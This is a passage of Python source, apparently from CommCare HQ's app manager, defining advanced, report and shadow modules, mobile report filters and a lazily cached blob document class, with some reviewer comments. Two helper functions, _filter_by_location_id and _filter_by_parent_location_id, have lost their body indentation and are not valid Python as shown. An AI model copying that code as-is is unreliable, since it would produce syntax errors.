        NOTE(review): the anchor is assigned *before* the duplicate check, so a
        duplicate raises only after self.anchor has already been mutated —
        presumably callers discard the module on error; verify before relying on it.
        """
        if new_anchor is None or new_anchor.strip() == '':
            raise ScheduleError(_("You can't create a phase without an anchor property"))
        self.anchor = new_anchor
        if self.get_module().phase_anchors.count(new_anchor) > 1:
            raise ScheduleError(_("You can't have more than one phase with the anchor {}").format(new_anchor))
class AdvancedModule(ModuleBase):
    """Module type holding AdvancedForms/ShadowForms, with case & product
    details and optional visit scheduling (schedule phases)."""
    module_type = 'advanced'
    forms = SchemaListProperty(FormBase)
    case_details = SchemaProperty(DetailPair)
    product_details = SchemaProperty(DetailPair)
    case_list = SchemaProperty(CaseList)
    has_schedule = BooleanProperty()
    schedule_phases = SchemaListProperty(SchedulePhase)
    get_schedule_phases = IndexedSchema.Getter('schedule_phases')
    search_config = SchemaProperty(CaseSearch)

    @property
    def is_surveys(self):
        # Advanced modules always deal with cases, never survey-only.
        return False

    @classmethod
    def wrap(cls, data):
        # lazy migration to accommodate search_config as empty list
        # http://manage.dimagi.com/default.asp?231186
        if data.get('search_config') == []:
            data['search_config'] = {}
        return super(AdvancedModule, cls).wrap(data)

    @classmethod
    def new_module(cls, name, lang):
        """Build a fresh AdvancedModule with default case/product detail columns."""
        detail = Detail(
            columns=[DetailColumn(
                format='plain',
                header={(lang or 'en'): ugettext("Name")},
                field='name',
                model='case',
            )]
        )
        module = AdvancedModule(
            name={(lang or 'en'): name or ugettext("Untitled Module")},
            forms=[],
            case_type='',
            case_details=DetailPair(
                # to_json() round-trip yields independent copies for short/long.
                short=Detail(detail.to_json()),
                long=Detail(detail.to_json()),
            ),
            product_details=DetailPair(
                short=Detail(
                    columns=[
                        DetailColumn(
                            format='plain',
                            header={(lang or 'en'): ugettext("Product")},
                            field='name',
                            model='product',
                        ),
                    ],
                ),
                long=Detail(),
            ),
        )
        module.get_or_create_unique_id()
        return module

    def new_form(self, name, lang, attachment=Ellipsis):
        """Create, append and return a new AdvancedForm.

        ``attachment`` uses Ellipsis as a sentinel so an explicit empty/None
        source can be distinguished from "not provided" (blank form XML).
        """
        from corehq.apps.app_manager.views.utils import get_blank_form_xml
        lang = lang if lang else "en"
        name = name if name else _("Untitled Form")
        form = AdvancedForm(
            name={lang: name},
        )
        form.schedule = FormSchedule(enabled=False)
        self.forms.append(form)
        # Re-fetch so the form is bound to this module (_parent is set).
        form = self.get_form(-1)
        if attachment == Ellipsis:
            attachment = get_blank_form_xml(name)
        form.source = attachment
        return form

    def new_shadow_form(self, name, lang):
        """Create, append and return a new ShadowForm (no XML of its own)."""
        lang = lang if lang else "en"
        name = name if name else _("Untitled Form")
        form = ShadowForm(
            name={lang: name},
            no_vellum=True,
        )
        form.schedule = FormSchedule(enabled=False)
        self.forms.append(form)
        form = self.get_form(-1)
        form.get_unique_id()  # This function sets the unique_id. Normally setting the source sets the id.
        return form

    def add_insert_form(self, from_module, form, index=None, with_source=False):
        """Copy/move ``form`` into this module, converting a basic Form's
        case actions into the equivalent advanced actions when necessary.

        :raises IncompatibleFormTypeException: for unsupported form types.
        """
        if isinstance(form, AdvancedForm):
            new_form = form
        elif isinstance(form, Form):
            # Convert a basic form: rebuild its case actions as advanced actions.
            new_form = AdvancedForm(
                name=form.name,
                form_filter=form.form_filter,
                media_image=form.media_image,
                media_audio=form.media_audio,
                comment=form.comment,
            )
            new_form._parent = self
            form._parent = self
            if with_source:
                new_form.source = form.source
            actions = form.active_actions()
            open = actions.get('open_case', None)
            update = actions.get('update_case', None)
            close = actions.get('close_case', None)
            preload = actions.get('case_preload', None)
            subcases = actions.get('subcases', None)
            case_type = from_module.case_type
            base_action = None
            if open:
                # Basic "open case" becomes an advanced open action carrying
                # any property updates.
                base_action = AdvancedOpenCaseAction(
                    case_type=case_type,
                    case_tag='open_{0}_0'.format(case_type),
                    name_path=open.name_path,
                    open_condition=open.condition,
                    case_properties=update.update if update else {},
                )
                new_form.actions.open_cases.append(base_action)
            elif update or preload or close:
                # No open: collapse update/preload/close into one load action.
                base_action = LoadUpdateAction(
                    case_type=case_type,
                    case_tag='load_{0}_0'.format(case_type),
                    case_properties=update.update if update else {},
                    preload=preload.preload if preload else {}
                )
                if from_module.parent_select.active:
                    from_app = from_module.get_app()  # A form can be copied from a module in a different app.
                    select_chain = get_select_chain(from_app, from_module, include_self=False)
                    # Walk the parent-select chain outermost-first, building
                    # 'parent', 'parent_parent', ... tagged load actions.
                    for n, link in enumerate(reversed(list(enumerate(select_chain)))):
                        i, module = link
                        new_form.actions.load_update_cases.append(LoadUpdateAction(
                            case_type=module.case_type,
                            case_tag='_'.join(['parent'] * (i + 1)),
                            details_module=module.unique_id,
                            case_index=CaseIndex(tag='_'.join(['parent'] * (i + 2)) if n > 0 else '')
                        ))
                    base_action.case_indices = [CaseIndex(tag='parent')]
                if close:
                    base_action.close_condition = close.condition
                new_form.actions.load_update_cases.append(base_action)
            if subcases:
                # Each subcase becomes an open action indexed on the base action.
                for i, subcase in enumerate(subcases):
                    open_subcase_action = AdvancedOpenCaseAction(
                        case_type=subcase.case_type,
                        case_tag='open_{0}_{1}'.format(subcase.case_type, i+1),
                        name_path=subcase.case_name,
                        open_condition=subcase.condition,
                        case_properties=subcase.case_properties,
                        repeat_context=subcase.repeat_context,
                        case_indices=[CaseIndex(
                            tag=base_action.case_tag if base_action else '',
                            reference_id=subcase.reference_id,
                        )]
                    )
                    new_form.actions.open_cases.append(open_subcase_action)
        else:
            raise IncompatibleFormTypeException()
        if index is not None:
            self.forms.insert(index, new_form)
        else:
            self.forms.append(new_form)
        return self.get_form(index or -1)

    def rename_lang(self, old_lang, new_lang):
        super(AdvancedModule, self).rename_lang(old_lang, new_lang)
        self.case_list.rename_lang(old_lang, new_lang)

    def requires_case_details(self):
        # Returns True, or falls through to an implicit None (falsy) when no
        # form loads/updates a case of this module's type.
        if self.case_list.show:
            return True
        for form in self.forms:
            if any(action.case_type == self.case_type for action in form.actions.load_update_cases):
                return True

    def all_forms_require_a_case(self):
        return all(form.requires_case() for form in self.forms)

    @property
    def search_detail(self):
        # Case search reuses a copy of the short case detail.
        return deepcopy(self.case_details.short)

    def get_details(self):
        """(slug, detail, enabled) tuples for suite generation."""
        details = [
            ('case_short', self.case_details.short, True),
            ('case_long', self.case_details.long, True),
            ('product_short', self.product_details.short, self.get_app().commtrack_enabled),
            ('product_long', self.product_details.long, False),
        ]
        if module_offers_search(self) and not self.case_details.short.custom_xml:
            details.append(('search_short', self.search_detail, True))
        return details

    @property
    def validator(self):
        return AdvancedModuleValidator(self)

    def _uses_case_type(self, case_type, invert_match=False):
        # Delegates to each form's uses_case_type check.
        return any(form.uses_case_type(case_type, invert_match) for form in self.forms)

    def uses_usercase(self):
        """Return True if this module has any forms that use the usercase.
        """
        return self._uses_case_type(USERCASE_TYPE)

    @property
    def phase_anchors(self):
        return [phase.anchor for phase in self.schedule_phases]

    def get_or_create_schedule_phase(self, anchor):
        """Returns a tuple of (phase, new?)"""
        if anchor is None or anchor.strip() == '':
            raise ScheduleError(_("You can't create a phase without an anchor property"))
        phase = next((phase for phase in self.get_schedule_phases() if phase.anchor == anchor), None)
        is_new_phase = False
        if phase is None:
            self.schedule_phases.append(SchedulePhase(anchor=anchor))
            # TODO: is there a better way of doing this?
            phase = list(self.get_schedule_phases())[-1]  # get the phase from the module so we know the _parent
            is_new_phase = True
        return (phase, is_new_phase)

    def _clear_schedule_phases(self):
        self.schedule_phases = []

    def update_schedule_phases(self, anchors):
        """ Take a list of anchors, reorders, deletes and creates phases from it """
        old_phases = {phase.anchor: phase for phase in self.get_schedule_phases()}
        self._clear_schedule_phases()
        for anchor in anchors:
            try:
                self.schedule_phases.append(old_phases.pop(anchor))
            except KeyError:
                # Anchor not previously present: create a brand new phase.
                self.get_or_create_schedule_phase(anchor)
        # Phases left in old_phases were dropped; refuse if any still hold forms.
        deleted_phases_with_forms = [anchor for anchor, phase in six.iteritems(old_phases) if len(phase.forms)]
        if deleted_phases_with_forms:
            raise ScheduleError(_("You can't delete phases with anchors "
                                  "{phase_anchors} because they have forms attached to them").format(
                phase_anchors=(", ").join(deleted_phases_with_forms)))
        return self.get_schedule_phases()

    def update_schedule_phase_anchors(self, new_anchors):
        """ takes a list of tuples (id, new_anchor) and updates the phase anchors """
        for anchor in new_anchors:
            id = anchor[0] - 1  # phases are 1-indexed in the UI
            new_anchor = anchor[1]
            try:
                list(self.get_schedule_phases())[id].change_anchor(new_anchor)
            except IndexError:
                pass  # That phase wasn't found, so we can't change its anchor. Ignore it

    def update_app_case_meta(self, meta):
        # Register every detail column (long and short) on the app case metadata.
        for column in self.case_details.long.columns:
            meta.add_property_detail('long', self.case_type, self.unique_id, column)
        for column in self.case_details.short.columns:
            meta.add_property_detail('short', self.case_type, self.unique_id, column)
class ReportAppFilter(DocumentSchema):
    """Base class for mobile report filters.

    ``wrap`` is polymorphic: wrapping the base class dispatches to the
    concrete subclass registered for the document's ``doc_type``.
    """
    @classmethod
    def wrap(cls, data):
        if cls is ReportAppFilter:
            return get_report_filter_class_for_doc_type(data['doc_type']).wrap(data)
        else:
            return super(ReportAppFilter, cls).wrap(data)

    def get_filter_value(self, user, ui_filter):
        # Subclasses must compute the filter value for the given restore user.
        raise NotImplementedError
# Registry entry describing one mobile report filter type:
# (couch doc_type, ReportAppFilter subclass, human-readable description).
MobileFilterConfig = namedtuple('MobileFilterConfig', ['doc_type', 'filter_class', 'short_description'])
def get_all_mobile_filter_configs():
    """Return the registry of all mobile report filter types.

    Each MobileFilterConfig maps a ReportAppFilter doc_type to its class and
    a translatable description shown in the app builder UI.
    """
    return [
        MobileFilterConfig('AutoFilter', AutoFilter, _('Value equal to a standard user property')),
        MobileFilterConfig('CustomDataAutoFilter', CustomDataAutoFilter,
                           _('Value equal to a custom user property')),
        MobileFilterConfig('StaticChoiceFilter', StaticChoiceFilter, _('An exact match of a constant value')),
        MobileFilterConfig('StaticChoiceListFilter', StaticChoiceListFilter,
                           _('An exact match of a dynamic property')),
        MobileFilterConfig('StaticDatespanFilter', StaticDatespanFilter, _('A standard date range')),
        MobileFilterConfig('CustomDatespanFilter', CustomDatespanFilter, _('A custom range relative to today')),
        # NOTE(review): added the missing closing ")" to this description —
        # the msgid changed, so the string may need retranslation.
        MobileFilterConfig('CustomMonthFilter', CustomMonthFilter,
                           _("Custom Month Filter (you probably don't want this)")),
        MobileFilterConfig('MobileSelectFilter', MobileSelectFilter, _('Show choices on mobile device')),
        MobileFilterConfig('AncestorLocationTypeFilter', AncestorLocationTypeFilter,
                           _("Ancestor location of the user's assigned location of a particular type")),
        MobileFilterConfig('NumericFilter', NumericFilter, _('A numeric expression')),
    ]
def get_report_filter_class_for_doc_type(doc_type):
    """Look up the ReportAppFilter subclass registered for ``doc_type``.

    :raises ValueError: when the doc_type is not in the registry.
    """
    matches = [
        config.filter_class
        for config in get_all_mobile_filter_configs()
        if config.doc_type == doc_type
    ]
    if not matches:
        raise ValueError('Unexpected doc_type for ReportAppFilter', doc_type)
    assert len(matches) == 1  # doc_types are unique in the registry
    return matches[0]
def _filter_by_case_sharing_group_id(user, ui_filter):
    """One Choice per case-sharing group the user belongs to."""
    from corehq.apps.reports_core.filters import Choice
    groups = user.get_case_sharing_groups()
    return [Choice(value=group._id, display=None) for group in groups]
def _filter_by_location_id(user, ui_filter):
return ui_filter.value(**{ui_filter.name: user.location_id,
'request_user': user})
def _filter_by_location_ids(user, ui_filter):
    """Evaluate the UI filter against all of the user's assigned location ids,
    joined with the userreports choice delimiter."""
    from corehq.apps.userreports.reports.filters.values import CHOICE_DELIMITER
    return ui_filter.value(**{ui_filter.name: CHOICE_DELIMITER.join(user.assigned_location_ids),
                              'request_user': user})
def _filter_by_username(user, ui_filter):
    """A single Choice wrapping the user's raw username."""
    from corehq.apps.reports_core.filters import Choice
    username = user.raw_username
    return Choice(value=username, display=None)
def _filter_by_user_id(user, ui_filter):
    """A single Choice wrapping the user's document id."""
    from corehq.apps.reports_core.filters import Choice
    user_id = user._id
    return Choice(value=user_id, display=None)
def _filter_by_parent_location_id(user, ui_filter):
location = user.sql_location
location_parent = location.parent.location_id if location and location.parent else None
return ui_filter.value(**{ui_filter.name: location_parent,
'request_user': user})
# Registry entry describing one automatic filter:
# (slug, callable(user, ui_filter) -> value, human-readable description).
AutoFilterConfig = namedtuple('AutoFilterConfig', ['slug', 'filter_function', 'short_description'])
def get_auto_filter_configurations():
    """Return the registry of automatic (user-derived) filter functions,
    keyed by slug via AutoFilterConfig."""
    return [
        AutoFilterConfig('case_sharing_group', _filter_by_case_sharing_group_id,
                         _("The user's case sharing group")),
        AutoFilterConfig('location_id', _filter_by_location_id, _("The user's assigned location")),
        AutoFilterConfig('location_ids', _filter_by_location_ids, _("All of the user's assigned locations")),
        AutoFilterConfig('parent_location_id', _filter_by_parent_location_id,
                         _("The parent location of the user's assigned location")),
        AutoFilterConfig('username', _filter_by_username, _("The user's username")),
        AutoFilterConfig('user_id', _filter_by_user_id, _("The user's ID")),
    ]
def _get_auto_filter_function(slug):
    """Look up the auto-filter function registered under ``slug``.

    :raises ValueError: when the slug is not in the registry.
    """
    matches = [
        config.filter_function
        for config in get_auto_filter_configurations()
        if config.slug == slug
    ]
    if not matches:
        raise ValueError('Unexpected ID for AutoFilter', slug)
    assert len(matches) == 1  # slugs are unique in the registry
    return matches[0]
class AutoFilter(ReportAppFilter):
    """Filter whose value is derived automatically from a standard user property."""
    # Slug into get_auto_filter_configurations().
    filter_type = StringProperty(choices=[f.slug for f in get_auto_filter_configurations()])

    def get_filter_value(self, user, ui_filter):
        return _get_auto_filter_function(self.filter_type)(user, ui_filter)
class CustomDataAutoFilter(ReportAppFilter):
    """Filter whose value comes from a custom user-data field."""
    custom_data_property = StringProperty()

    def get_filter_value(self, user, ui_filter):
        from corehq.apps.reports_core.filters import Choice
        # NOTE(review): raises KeyError if the user lacks this data field — verify callers.
        return Choice(value=user.user_data[self.custom_data_property], display=None)
class StaticChoiceFilter(ReportAppFilter):
    """Filter pinned to a single constant value."""
    select_value = StringProperty()

    def get_filter_value(self, user, ui_filter):
        from corehq.apps.reports_core.filters import Choice
        return [Choice(value=self.select_value, display=None)]
class StaticChoiceListFilter(ReportAppFilter):
    """Filter pinned to a fixed list of values."""
    value = StringListProperty()

    def get_filter_value(self, user, ui_filter):
        from corehq.apps.reports_core.filters import Choice
        return [Choice(value=string_value, display=None) for string_value in self.value]
class StaticDatespanFilter(ReportAppFilter):
    """Filter using one of the standard named date ranges (e.g. last 30 days)."""
    date_range = StringProperty(
        choices=[choice.slug for choice in get_simple_dateranges()],
        required=True,
    )

    def get_filter_value(self, user, ui_filter):
        start_date, end_date = get_daterange_start_end_dates(self.date_range)
        return DateSpan(startdate=start_date, enddate=end_date)
class CustomDatespanFilter(ReportAppFilter):
    """Filter for a date range expressed relative to "today" in the user's
    timezone: e.g. "= N days ago", ">= N days ago", or between two day counts.
    """
    operator = StringProperty(
        choices=[
            '=',
            '<=',
            '>=',
            '>',
            '<',
            'between'
        ],
        required=True,
    )
    # Day offsets are stored as strings and parsed with int() at evaluation time.
    date_number = StringProperty(required=True)
    date_number2 = StringProperty()  # only used by the 'between' operator

    def get_filter_value(self, user, ui_filter):
        assert user is not None, (
            "CustomDatespanFilter.get_filter_value must be called "
            "with an OTARestoreUser object, not None")

        timezone = get_timezone_for_domain(user.domain)
        # "today" in the domain's timezone, not server UTC.
        today = ServerTime(datetime.datetime.utcnow()).user_time(timezone).done().date()
        start_date = end_date = None
        days = int(self.date_number)
        if self.operator == 'between':
            days2 = int(self.date_number2)
            # allows user to have specified the two numbers in either order
            # (start is always the larger offset, i.e. the earlier date)
            if days > days2:
                end = days2
                start = days
            else:
                start = days2
                end = days
            start_date = today - datetime.timedelta(days=start)
            end_date = today - datetime.timedelta(days=end)
        elif self.operator == '=':
            start_date = end_date = today - datetime.timedelta(days=days)
        elif self.operator == '>=':
            # at least N days ago -> everything up to that date
            start_date = None
            end_date = today - datetime.timedelta(days=days)
        elif self.operator == '<=':
            # at most N days ago -> everything from that date onward
            start_date = today - datetime.timedelta(days=days)
            end_date = None
        elif self.operator == '<':
            # strict inequalities shift the boundary by one day
            start_date = today - datetime.timedelta(days=days - 1)
            end_date = None
        elif self.operator == '>':
            start_date = None
            end_date = today - datetime.timedelta(days=days + 1)
        return DateSpan(startdate=start_date, enddate=end_date)
def is_lte(integer):
    """Build a property validator asserting the value is <= ``integer``."""
    message = 'Value must be less than or equal to {}'.format(integer)

    def validate(x):
        if not x <= integer:
            raise BadValueError(message)
    return validate
def is_gte(integer):
    """Build a property validator asserting the value is >= ``integer``."""
    message = 'Value must be greater than or equal to {}'.format(integer)

    def validate(x):
        if not x >= integer:
            raise BadValueError(message)
    return validate
class CustomMonthFilter(ReportAppFilter):
    """
    Filter by months that start on a day number other than 1

    See [FB 215656](http://manage.dimagi.com/default.asp?215656)
    """
    # Values for start_of_month < 1 specify the number of days from the end of the month. Values capped at
    # len(February).
    start_of_month = IntegerProperty(
        required=True,
        validators=(is_gte(-27), is_lte(28))
    )
    # DateSpan to return i.t.o. number of months to go back
    period = IntegerProperty(
        default=DEFAULT_MONTH_FILTER_PERIOD_LENGTH,
        validators=(is_gte(0),)
    )

    @classmethod
    def wrap(cls, doc):
        # Coerce legacy string values to ints on load.
        doc['start_of_month'] = int(doc['start_of_month'])
        if 'period' in doc:
            doc['period'] = int(doc['period'] or DEFAULT_MONTH_FILTER_PERIOD_LENGTH)
        return super(CustomMonthFilter, cls).wrap(doc)

    def get_filter_value(self, user, ui_filter):
        """Return the DateSpan of the custom "month" ``period`` months back."""
        def get_last_month(this_month):
            # Last day of the previous calendar month.
            return datetime.date(this_month.year, this_month.month, 1) - datetime.timedelta(days=1)

        def get_last_day(date):
            _, last_day = calendar.monthrange(date.year, date.month)
            return last_day

        start_of_month = int(self.start_of_month)
        today = datetime.date.today()
        if start_of_month > 0:
            start_day = start_of_month
        else:
            # start_of_month is zero or negative. Work backwards from the end of the month
            start_day = get_last_day(today) + start_of_month

        # Loop over months backwards for period > 0
        month = today if today.day >= start_day else get_last_month(today)
        for i in range(int(self.period)):
            month = get_last_month(month)

        if start_of_month > 0:
            start_date = datetime.date(month.year, month.month, start_day)
            days = get_last_day(start_date) - 1
            end_date = start_date + datetime.timedelta(days=days)
        else:
            # Negative offsets: recompute the start day for the chosen month
            # and end the span the same offset before the end of the next month.
            start_day = get_last_day(month) + start_of_month
            start_date = datetime.date(month.year, month.month, start_day)
            next_month = datetime.date(month.year, month.month, get_last_day(month)) + datetime.timedelta(days=1)
            end_day = get_last_day(next_month) + start_of_month - 1
            end_date = datetime.date(next_month.year, next_month.month, end_day)

        return DateSpan(startdate=start_date, enddate=end_date)
class MobileSelectFilter(ReportAppFilter):
    """Filter whose choices are presented on the mobile device; contributes
    no server-side value."""
    def get_filter_value(self, user, ui_filter):
        return None
class AncestorLocationTypeFilter(ReportAppFilter):
    """Filter by the ancestor (of a given location type) of the user's
    assigned location."""
    ancestor_location_type_name = StringProperty()

    def get_filter_value(self, user, ui_filter):
        from corehq.apps.locations.models import SQLLocation
        from corehq.apps.reports_core.filters import REQUEST_USER_KEY

        kwargs = {REQUEST_USER_KEY: user}
        try:
            ancestor = user.sql_location.get_ancestors(include_self=True).\
                get(location_type__name=self.ancestor_location_type_name)
            kwargs[ui_filter.name] = ancestor.location_id
        except (AttributeError, SQLLocation.DoesNotExist):
            # user.sql_location is None, or location does not have an ancestor of that type
            pass
        return ui_filter.value(**kwargs)
class NumericFilter(ReportAppFilter):
    """Filter comparing a numeric report value against a constant operand."""
    # BUG FIX: the original line ended with a trailing comma, which bound
    # ``operator`` to a 1-tuple *containing* the StringProperty descriptor
    # instead of the property itself, so the field was never a real schema
    # property (no validation, no (de)serialization).
    operator = StringProperty(choices=['=', '!=', '<', '<=', '>', '>='])
    operand = FloatProperty()

    @classmethod
    def wrap(cls, doc):
        # Coerce legacy string operands to float on load.
        doc['operand'] = float(doc['operand'])
        return super(NumericFilter, cls).wrap(doc)

    def get_filter_value(self, user, ui_filter):
        return {
            'operator': self.operator,
            'operand': self.operand,
        }
class ReportAppConfig(DocumentSchema):
    """
    Class for configuring how a user configurable report shows up in an app
    """
    # ID of the ReportConfiguration
    report_id = StringProperty(required=True)
    header = DictProperty()
    localized_description = DictProperty()
    xpath_description = StringProperty()
    use_xpath_description = BooleanProperty(default=False)
    show_data_table = BooleanProperty(default=True)
    complete_graph_configs = DictProperty(GraphConfiguration)

    filters = SchemaDictProperty(ReportAppFilter)
    # Unique ID of this mobile report config
    uuid = StringProperty(required=True)
    report_slug = StringProperty(required=False)  # optional, user-provided
    sync_delay = DecimalProperty(default=0.0)  # in hours

    # per-instance cache for report(); not a schema property
    _report = None

    def __init__(self, *args, **kwargs):
        super(ReportAppConfig, self).__init__(*args, **kwargs)
        # Ensure every config gets a uuid even when constructed in code.
        if not self.uuid:
            self.uuid = uuid.uuid4().hex

    @classmethod
    def wrap(cls, doc):
        # for backwards compatibility with apps that have localized or xpath descriptions
        old_description = doc.get('description')
        if old_description:
            if isinstance(old_description, six.string_types) and not doc.get('xpath_description'):
                soft_assert_type_text(old_description)
                doc['xpath_description'] = old_description
            elif isinstance(old_description, dict) and not doc.get('localized_description'):
                doc['localized_description'] = old_description
        if not doc.get('xpath_description'):
            # default to an empty xpath string literal
            doc['xpath_description'] = '""'

        return super(ReportAppConfig, cls).wrap(doc)

    def report(self, domain):
        """Fetch (and cache) the underlying ReportConfiguration for ``domain``."""
        if self._report is None:
            from corehq.apps.userreports.models import get_report_config
            self._report = get_report_config(self.report_id, domain)[0]
        return self._report

    @property
    def instance_id(self):
        # Prefer the human-readable slug when the user supplied one.
        return self.report_slug or self.uuid
class ReportModule(ModuleBase):
    """
    Module for user configurable reports
    """

    module_type = 'report'

    report_configs = SchemaListProperty(ReportAppConfig)
    forms = []  # report modules have no forms
    _loaded = False
    put_in_root = False

    @property
    @memoized
    def reports(self):
        """The ReportConfiguration docs referenced by this module's configs."""
        from corehq.apps.userreports.models import get_report_configs
        return get_report_configs([r.report_id for r in self.report_configs], self.get_app().domain)

    @classmethod
    def new_module(cls, name, lang):
        module = ReportModule(
            name={(lang or 'en'): name or ugettext("Reports")},
            case_type='',
        )
        module.get_or_create_unique_id()
        return module

    def get_details(self):
        from corehq.apps.app_manager.suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
        return ReportModuleSuiteHelper(self).get_details()

    def get_custom_entries(self):
        from corehq.apps.app_manager.suite_xml.features.mobile_ucr import ReportModuleSuiteHelper
        return ReportModuleSuiteHelper(self).get_custom_entries()

    def get_menus(self, supports_module_filter=False):
        """Yield the localized suite menu containing one command per report config."""
        kwargs = {}
        if supports_module_filter:
            kwargs['relevant'] = interpolate_xpath(self.module_filter)

        menu = suite_models.LocalizedMenu(
            id=id_strings.menu_id(self),
            menu_locale_id=id_strings.module_locale(self),
            media_image=bool(len(self.all_image_paths())),
            media_audio=bool(len(self.all_audio_paths())),
            image_locale_id=id_strings.module_icon_locale(self),
            audio_locale_id=id_strings.module_audio_locale(self),
            **kwargs
        )
        menu.commands.extend([
            suite_models.Command(id=id_strings.report_command(config.uuid))
            for config in self.report_configs
        ])
        yield menu

    def check_report_validity(self):
        """
        returns is_valid, valid_report_configs

        If any report doesn't exist, is_valid is False, otherwise True
        valid_report_configs is a list of all report configs that refer to existing reports
        """
        try:
            all_report_ids = [report._id for report in self.reports]
            valid_report_configs = [report_config for report_config in self.report_configs
                                    if report_config.report_id in all_report_ids]
            is_valid = (len(valid_report_configs) == len(self.report_configs))
        except ReportConfigurationNotFoundError:
            valid_report_configs = []  # assuming that if one report is in a different domain, they all are
            is_valid = False

        return namedtuple('ReportConfigValidity', 'is_valid valid_report_configs')(
            is_valid=is_valid,
            valid_report_configs=valid_report_configs
        )

    @property
    def validator(self):
        return ReportModuleValidator(self)
class ShadowModule(ModuleBase, ModuleDetailsMixin):
    """
    A module that acts as a shortcut to another module. This module has its own
    settings (name, icon/audio, filter, etc.) and its own case list/detail, but
    inherits case type and forms from its source module.
    """
    module_type = 'shadow'
    source_module_id = StringProperty()
    forms = []  # forms come from the source module, never stored here
    excluded_form_ids = SchemaListProperty()
    case_details = SchemaProperty(DetailPair)
    ref_details = SchemaProperty(DetailPair)
    case_list = SchemaProperty(CaseList)
    referral_list = SchemaProperty(CaseList)
    task_list = SchemaProperty(CaseList)
    parent_select = SchemaProperty(ParentSelect)
    search_config = SchemaProperty(CaseSearch)

    get_forms = IndexedSchema.Getter('forms')

    @classmethod
    def wrap(cls, data):
        data = cls.wrap_details(data)
        return super(ShadowModule, cls).wrap(data)

    @property
    def source_module(self):
        """The module being shadowed, or None when unset/not found."""
        if self.source_module_id:
            try:
                return self._parent.get_module_by_unique_id(self.source_module_id)
            except ModuleNotFoundException:
                pass
        return None

    @property
    def case_type(self):
        # Inherited from the source module.
        if not self.source_module:
            return None
        return self.source_module.case_type

    @property
    def requires(self):
        if not self.source_module:
            return 'none'
        return self.source_module.requires

    @property
    def root_module_id(self):
        if not self.source_module:
            return None
        return self.source_module.root_module_id

    def get_suite_forms(self):
        """Source-module forms minus any this shadow explicitly excludes."""
        if not self.source_module:
            return []
        return [f for f in self.source_module.get_forms() if f.unique_id not in self.excluded_form_ids]

    @parse_int([1])
    def get_form(self, i):
        # Shadow modules own no forms of their own.
        return None

    def requires_case_details(self):
        if not self.source_module:
            return False
        return self.source_module.requires_case_details()

    def get_case_types(self):
        if not self.source_module:
            return []
        return self.source_module.get_case_types()

    @memoized
    def get_subcase_types(self):
        if not self.source_module:
            return []
        return self.source_module.get_subcase_types()

    @memoized
    def all_forms_require_a_case(self):
        # NOTE(review): returns [] (falsy) rather than False when there is no
        # source module — callers appear to use this only for truthiness.
        if not self.source_module:
            return []
        return self.source_module.all_forms_require_a_case()

    @classmethod
    def new_module(cls, name, lang):
        """Build a fresh ShadowModule with a default case detail column."""
        lang = lang or 'en'
        detail = Detail(
            columns=[DetailColumn(
                format='plain',
                header={(lang or 'en'): ugettext("Name")},
                field='name',
                model='case',
            )]
        )
        module = ShadowModule(
            name={(lang or 'en'): name or ugettext("Untitled Module")},
            case_details=DetailPair(
                short=Detail(detail.to_json()),
                long=Detail(detail.to_json()),
            ),
        )
        module.get_or_create_unique_id()
        return module

    @property
    def validator(self):
        return ShadowModuleValidator(self)
class LazyBlobDoc(BlobMixin):
    """LazyAttachmentDoc for blob db
    Cache blobs in local memory (for this request)
    and in django cache (for the next few requests)
    and commit to couchdb.
    See also `dimagi.utils.couch.lazy_attachment_doc.LazyAttachmentDoc`
    Cache strategy:
    - on fetch, check in local memory, then cache
    - if both are a miss, fetch from couchdb and store in both
    - after an attachment is committed to the blob db and the
      save has succeeded, save the attachment in the cache
    """
    def __init__(self, *args, **kwargs):
        super(LazyBlobDoc, self).__init__(*args, **kwargs)
        # attachments queued by lazy_put_attachment; flushed to the blob db
        # on save() and then cleared
        self._LAZY_ATTACHMENTS = {}
        # to cache fetched attachments
        # these we do *not* send back down upon save
        self._LAZY_ATTACHMENTS_CACHE = {}
    @classmethod
    def wrap(cls, data):
        """Wrap couch data, turning inline '_attachments' into lazy puts."""
        if "_attachments" in data:
            data = data.copy()
            attachments = data.pop("_attachments").copy()
            if cls._migrating_blobs_from_couch:
                # preserve stubs so couch attachments don't get deleted on save
                stubs = {}
                for name, value in list(attachments.items()):
                    if isinstance(value, dict) and "stub" in value:
                        stubs[name] = attachments.pop(name)
                if stubs:
                    data["_attachments"] = stubs
        else:
            attachments = None
        self = super(LazyBlobDoc, cls).wrap(data)
        if attachments:
            for name, attachment in attachments.items():
                if isinstance(attachment, six.text_type):
                    attachment = attachment.encode('utf-8')
                if isinstance(attachment, bytes):
                    info = {"content": attachment}
                else:
                    raise ValueError("Unknown attachment format: {!r}"
                                     .format(attachment))
                self.lazy_put_attachment(name=name, **info)
        return self
    def __attachment_cache_key(self, name):
        # django-cache key, scoped by document id
        return 'lazy_attachment/{id}/{name}'.format(id=self.get_id, name=name)
    def __set_cached_attachment(self, name, content, timeout=60*60*24):
        # write through to both the django cache and the request-local cache
        cache.set(self.__attachment_cache_key(name), content, timeout=timeout)
        self._LAZY_ATTACHMENTS_CACHE[name] = content
    def __get_cached_attachment(self, name):
        """Return cached content or None; checks local memory then django cache."""
        try:
            # it has been fetched already during this request
            content = self._LAZY_ATTACHMENTS_CACHE[name]
        except KeyError:
            content = cache.get(self.__attachment_cache_key(name))
            if content is not None:
                if isinstance(content, six.text_type):
                    _soft_assert(False, 'cached attachment has type unicode')
                    content = content.encode('utf-8')
                self._LAZY_ATTACHMENTS_CACHE[name] = content
        return content
    def put_attachment(self, content, name=None, *args, **kw):
        # drop any stale cached copy before writing the new content
        cache.delete(self.__attachment_cache_key(name))
        self._LAZY_ATTACHMENTS_CACHE.pop(name, None)
        return super(LazyBlobDoc, self).put_attachment(content, name, *args, **kw)
    def has_attachment(self, name):
        return name in self.lazy_list_attachments()
    def lazy_put_attachment(self, content, name=None, content_type=None,
                            content_length=None):
        """
        Ensure the attachment is available through lazy_fetch_attachment
        and that upon self.save(), the attachments are put to the doc as well
        """
        self._LAZY_ATTACHMENTS[name] = {
            'content': content,
            'content_type': content_type,
            'content_length': content_length,
        }
    def lazy_fetch_attachment(self, name):
        """Fetch attachment content, consulting the caches before couch/blobdb.

        Raises ResourceNotFound when the attachment is missing (including a
        previously cached miss).
        """
        # it has been put/lazy-put already during this request
        if name in self._LAZY_ATTACHMENTS:
            content = self._LAZY_ATTACHMENTS[name]['content']
        else:
            content = self.__get_cached_attachment(name)
            if content is None:
                try:
                    content = self.fetch_attachment(name, return_bytes=True)
                except ResourceNotFound as e:
